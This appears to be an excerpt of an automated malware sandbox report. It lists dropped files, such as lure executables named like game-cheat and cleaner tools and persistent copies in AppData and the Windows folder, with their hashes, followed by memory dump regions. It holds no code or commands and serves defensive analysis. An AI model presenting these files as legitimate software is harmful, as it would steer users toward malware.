SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\GraphiteDawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\GraphiteDawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NetworkEX.exe.log

Filesize
1KB

MD5
f39f39c226ceafd197ec727555ad4006

SHA1
b8b23087b757f6deadc134f183cbaad1dfb9a0cf

SHA256
af297a367f79530d10cdd5aeb97b4ec01d59ad5c4e1dddd6cdc9815f95d0b2c0

SHA512
a33739e4a1115c3a89dbe9c44bf8b6a2e10ec484de3061b2d45b76116859d7c36513d82a5e42533ea4c71248ab1e6b8083662af31a92d12b097d191293a4ef27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e443ee4336fcf13c698b8ab5f3c173d0

SHA1
9bf70b16f03820cbe3158e1f1396b07b8ac9d75a

SHA256
79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b

SHA512
cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
56a4f78e21616a6e19da57228569489b

SHA1
21bfabbfc294d5f2aa1da825c5590d760483bc76

SHA256
d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb

SHA512
c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
25f77abeda140ac858bec8f62b3281f2

SHA1
e56008aa95a485b8d3fa077c4477a7bec5f3812d

SHA256
1e9549e237bee7bc95034d1a113d32f700a0b195e73929236cb4f104d819e017

SHA512
cba876a445ca92128895f59e4caad537e633c5cf5667d6e44f0187cf527195d1fe4c0fee3e30948c3d8a7e974e715c540736ad9fa024252b4978767e07755572

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
6dea05ca795a3d02fed995a2c97fb294

SHA1
f0d8019df43c0138ff3b4e7dc138a0d7ac901e13

SHA256
852b0a33601d528778a2aa56f82f7fe3627d292ca5e2f6596bca6d67863a06c6

SHA512
f8fd7ac2d6cfbf04c82b25c019b34d225a1d47752d2b96c4c99b0dcf33194aca5d5da7c485fd602031a4b87599f6d812671168cd931eeff4da1d8eb60af2dbfc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
e9eb8dd01d1c5597a9eb30496db020b7

SHA1
7a022b8e89d485acdb7495d71f901227c39b3927

SHA256
79fadcd2aeefb230020d1870e1e1e450bc57fef9ea108be78609d7843f386f48

SHA512
b4957b2886723c7a1a64efd3b96a8b6620779240795adf93cef251f218f0ecaa5af739515a97637bd2a4a4517bde68b1f81f0972efbf7d623c20cc29f08c6703

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
9KB

MD5
f551204e4e5b522bbc15d402420083b4

SHA1
393b5fb7b311128c817ee438255cff1e48ec4902

SHA256
d08c8cbd9ed26e74d97c16cb0823ff772cbcac70598810ac756bdd04d760cd42

SHA512
f70fd815f88b0cce904884d5017b413ac3106535659b8b8a9f2011e6779e32eb7957034d81e260f6896353fbce514e88d72c8c2a729d6cda466feb6324ba1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b67bdaeb6ebed24ffd4a5e43f4496fb9

SHA1
5d04de0638d0c27a80154ba3fc353e1fe0a6173b

SHA256
e2f1512405b5842c82d42eeea3b36e755f65ae000184b1108b86132d3a0e53b8

SHA512
4e753bf77ccbeb18524978124f3c079a68c0d334df9c707d65e598f9b37be48c60665bc2f4899cfd75e72e3f33a2debc057cc20a1607c9a22becb9dc40639b44

Download Submit
C:\Users\Admin\AppData\Local\NEX.exe

Filesize
46KB

MD5
49592068de00ac0b55980502a7a78a18

SHA1
43237168c7d0170076c466f9a738e0c30dbceb16

SHA256
08966125b28e88837732b990977124b7ab7393474cc10770375370af3801a898

SHA512
6340d949dcd79be953a8781f764e63154b63fb3f24e316c0e6b81fa9ec773c9087a529e8cef90d4ec3ad8f611855b298cefbc85b608ea32a014ceaaabd128f78

Download Submit
C:\Users\Admin\AppData\Local\Temp\AccuracyFN Swoofer.exe

Filesize
19KB

MD5
d9f380de63eb79d069848b7fa8093e19

SHA1
f06585fc7d08dc67c1cb6171415a33ffb8683189

SHA256
b6cb8289496b89de66a1d22897053403acc3b6f88aa64e20b975a42bf937ce34

SHA512
794616dd385dedf61c8ec93dcefb358f1f0b778ccb62588557b8be2ca59d555dced9738af1f0d1045557fb4a7a127e071cca525dea4ad630f5dfe25889a32ed5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Koks_Cleaner.exe

Filesize
217KB

MD5
22bd165c9c2a38257ff23687d9ae0774

SHA1
1a84ddbb284e3e6d95f78371c6c92a1d32ae1271

SHA256
3decb581b456e36db05f7a9ffbc8b1c14964d059ffd6fad6d99b42a1b7dd9bb9

SHA512
fa0a8307fbbc7ed1d49f5612bd05acdfe4aea5a5222dd65b13a5b3b457f1d3865bf794b8bf484c693d6553fc52cd8d5a91c96129fb367f7eb930c223f49678f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\NXT Cleaner.exe

Filesize
3.2MB

MD5
644399a0aff07bd4f7dc1eb5aa5c0236

SHA1
243f1f7bb95af8d3c44a270772f408c6febb06af

SHA256
5d101b2efae1e9390ac98e014a05d54338ec45cd73ff5dd70842877910f7b758

SHA512
73db539182c67d18b4e491966672876054cdeaae9d5ac024f1991a0551aea74867d9f1df7487655a5c9089553b967c09f558b02e33ec0cc015b6587fd5eb2508

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqsguvhy.wgh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nExOs.exe

Filesize
1.6MB

MD5
23e4c238bcb922264e053daddc9386f9

SHA1
096327749ff3f913c67785b8110ec5ada1f414ee

SHA256
775d7e68654c70a764f72629812eda2b73520eeac12efb42d60efda16d8225a0

SHA512
34c59ab73aa231b224ea1a2b62f3a4956f8a556acb7abc2f4c1e3e1a9939b3bd49a378d0649d2a541b1cbc763b7bd5187e977d8eb94115603217bc6d7c93aebe

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCDDF.tmp.bat

Filesize
153B

MD5
610fdcb96b4162e369869c4fab64e189

SHA1
79ad54797f8576ea652ed0a3c31e7fbfbce08d09

SHA256
4811979dba9890c1e563596d5338a43abbe3e233b787e50d4a651904f8663890

SHA512
2db5201eeb121155603ec25c2b721c90e595aeac755b8a773288c0480e443177344e07a5bde9b80b74abe879c7fa629600b7d3714300c3467019a8663e033fe7

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD5ED.tmp.bat

Filesize
153B

MD5
7bdad52c936a79a8b5b7f6b4a3d73147

SHA1
abeccc437d61e2583946c12ab7c960f4c350980c

SHA256
aeb9232221f5837e551f4a2fa4cc54e8f90128ac1df91c7ecb8fb98f97fbaedc

SHA512
39eb3edf022fab82e76fcda8c24cd3c87239d9ee2e7127d15fa295c23d554443269de9ca0b061a2d2065c7066263608165c58afcf8d7b5bbd151b1534377a978

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\PERTHE563456HGRSEG674RSGE\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm

Filesize
32KB

MD5
b7c14ec6110fa820ca6b65f5aec85911

SHA1
608eeb7488042453c9ca40f7e1398fc1a270f3f4

SHA256
fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb

SHA512
d8d75760f29b1e27ac9430bc4f4ffcec39f1590be5aef2bfb5a535850302e067c288ef59cf3b2c5751009a22a6957733f9f80fa18f2b0d33d90c068a3f08f3b0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\PERTHE563456HGRSEG674RSGE\storage\permanent\chrome\idb\3561288849sdhlie.sqlite

Filesize
48KB

MD5
815c371339438597d1643e3af7ee79e4

SHA1
38d1dde1d79ba53c19b4f7bc6ea473ce25c1b7df

SHA256
3fc569215a9d2b0c01338b41aecbac25c5ad6ead5c20b1eec8f36029a2f91529

SHA512
b8c4eb575ba436a35a10fefd7c1f698d2b9227d44fd4c8537867022241c6642c97431cb4cf60284bab86f8858e5ffd596731c7fa8fadcf9a9f378549be802a9b

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
C:\Users\Admin\AppData\Roaming\Network Experience.exe

Filesize
74KB

MD5
912eae8fe9cd4fbce5bc1973d260ac7c

SHA1
c5ef553fbaa201df4b8ab28ce07053eb92e5e225

SHA256
fcc7fb6cb01904fcd07c1a32bf28913e8793219f8536d188b28a3e1659d094a4

SHA512
e8640b818286cfbefdc4b62d79e37138b57580de9c1d9d89858552837ba09f1fcbe8979c96f23c981634716e1280ec33ee7d4be57e5d809b50cf06467803a21b

Download Submit
C:\Users\Admin\NetworkEX.exe

Filesize
585KB

MD5
5350dbd4a054948b6b6f9d9a1e38d4d5

SHA1
cfc57fe0f9e489364bd4d51aaf8f963340267fdb

SHA256
c4e16cd490dfad21cb9b352e3c7c03d99fc5f38cf20ae7cb595d00b082844bdb

SHA512
74d5159cb923d3b416a0c5f82d737e13e14423e43b020a9601a664b1880b579ca7132cc35b0c7a38a072baa633e5fb0495456b4a2b62a5181a179a46421ed9db

Download Submit
C:\Windows\Network.exe

Filesize
91KB

MD5
e14da59f36f995b0a212775074e25ce7

SHA1
574ba408726a83ec63a37782cc4e0cf2f009dabd

SHA256
19fcfef4db315e0d0a65bb7f13b35503559a00f2fb83298449fd719075f32c45

SHA512
6db0b5a34ca9e9e234b841cfb44bc5b5e9c3fea2585634702b8bfcf44af947e48b5c2ac4ec8d532b84b0c7c6aec6ea1b1155f5a75b7fdbe363b1eb2370c63b21

Download Submit
C:\Windows\NetworkEX.exe

Filesize
803KB

MD5
69c2b301ae1b996bc8d50589992df9cd

SHA1
f3e8ddb6351faf2e3556f4b255441be0b1aecd77

SHA256
ac15826ff25a52272687a23bf93194ff27267ab6893ad569afbfa6d2df426b76

SHA512
73e21e1c0ce97c936f02106db593a957fae4129e4746fe9a0b8bea8b5dd407af5cf12b4873ed55bd3e472d16f5e16c54498d9d48546560e719eec51b557bffe9

Download Submit
memory/512-651-0x0000000074130000-0x000000007417C000-memory.dmp

Filesize
304KB

Download
memory/2596-126-0x00000000007D0000-0x0000000000868000-memory.dmp

Filesize
608KB

Download
memory/3048-125-0x0000000000B30000-0x0000000000B40000-memory.dmp

Filesize
64KB

Download
memory/3092-104-0x0000000140000000-0x0000000140567000-memory.dmp

Filesize
5.4MB

Download
memory/3416-106-0x0000000000750000-0x0000000000768000-memory.dmp

Filesize
96KB

Download
memory/3700-121-0x0000000000B70000-0x0000000000B8E000-memory.dmp

Filesize
120KB

Download
memory/4880-619-0x0000000006DC0000-0x0000000006E63000-memory.dmp

Filesize
652KB

Download
memory/4880-64-0x0000000004E00000-0x0000000005428000-memory.dmp

Filesize
6.2MB

Download
memory/4880-668-0x0000000007180000-0x0000000007188000-memory.dmp

Filesize
32KB

Download
memory/4880-665-0x0000000007230000-0x000000000724A000-memory.dmp

Filesize
104KB

Download
memory/4880-664-0x0000000007150000-0x0000000007164000-memory.dmp

Filesize
80KB

Download
memory/4880-663-0x0000000007140000-0x000000000714E000-memory.dmp

Filesize
56KB

Download
memory/4880-662-0x0000000007100000-0x0000000007111000-memory.dmp

Filesize
68KB

Download
memory/4880-661-0x0000000007190000-0x0000000007226000-memory.dmp

Filesize
600KB

Download
memory/4880-650-0x0000000006F70000-0x0000000006F7A000-memory.dmp

Filesize
40KB

Download
memory/4880-649-0x0000000006F00000-0x0000000006F1A000-memory.dmp

Filesize
104KB

Download
memory/4880-648-0x0000000007540000-0x0000000007BBA000-memory.dmp

Filesize
6.5MB

Download
memory/4880-564-0x0000000074130000-0x000000007417C000-memory.dmp

Filesize
304KB

Download
memory/4880-29-0x000000007385E000-0x000000007385F000-memory.dmp

Filesize
4KB

Download
memory/4880-696-0x0000000073850000-0x0000000074000000-memory.dmp

Filesize
7.7MB

Download
memory/4880-136-0x00000000055A0000-0x00000000058F4000-memory.dmp

Filesize
3.3MB

Download
memory/4880-151-0x0000000005D20000-0x0000000005D6C000-memory.dmp

Filesize
304KB

Download
memory/4880-150-0x0000000005BD0000-0x0000000005BEE000-memory.dmp

Filesize
120KB

Download
memory/4880-63-0x0000000073850000-0x0000000074000000-memory.dmp

Filesize
7.7MB

Download
memory/4880-556-0x00000000061A0000-0x00000000061D2000-memory.dmp

Filesize
200KB

Download
memory/4880-129-0x0000000004D90000-0x0000000004DF6000-memory.dmp

Filesize
408KB

Download
memory/4880-130-0x0000000005430000-0x0000000005496000-memory.dmp

Filesize
408KB

Download
memory/4880-128-0x0000000004AF0000-0x0000000004B12000-memory.dmp

Filesize
136KB

Download
memory/4880-60-0x0000000004620000-0x0000000004656000-memory.dmp

Filesize
216KB

Download
memory/4880-597-0x0000000006D90000-0x0000000006DAE000-memory.dmp

Filesize
120KB

Download
memory/4880-101-0x0000000073850000-0x0000000074000000-memory.dmp

Filesize
7.7MB

Download
memory/4884-727-0x00000245BDD00000-0x00000245BDD24000-memory.dmp

Filesize
144KB

Download
memory/4884-726-0x00000245BDD00000-0x00000245BDD2A000-memory.dmp

Filesize
168KB

Download
memory/4884-712-0x00000245BD7E0000-0x00000245BD802000-memory.dmp

Filesize
136KB

Download